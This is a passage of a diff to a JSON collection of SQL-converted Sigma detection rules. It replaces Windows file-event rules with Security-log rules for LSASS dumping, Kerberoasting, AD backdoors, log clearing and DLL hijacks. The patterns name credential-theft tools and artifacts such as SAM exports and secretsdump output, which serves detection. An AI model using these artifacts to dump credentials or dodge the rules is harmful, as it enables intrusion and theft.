"file_event_win_uac_bypass_winsat.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.lateral_movement", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "tags": [ + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.001" + "attack.t1562.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "Security Event Log Cleared", + "id": "a122ac13-daf8-4175-83a2-72c387be339d", + "status": "test", + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "author": "Saw Winn Naung", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1070.001" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_event_log_cleared.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", - "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "title": "User Added to Local Administrators", + "id": "c265cf08-3f99-46c1-8d59-328247057d57", + "status": "stable", + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1546.013" + "attack.t1078", + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_user_added_to_local_administrators.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Files that accidentally contain these strings" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory 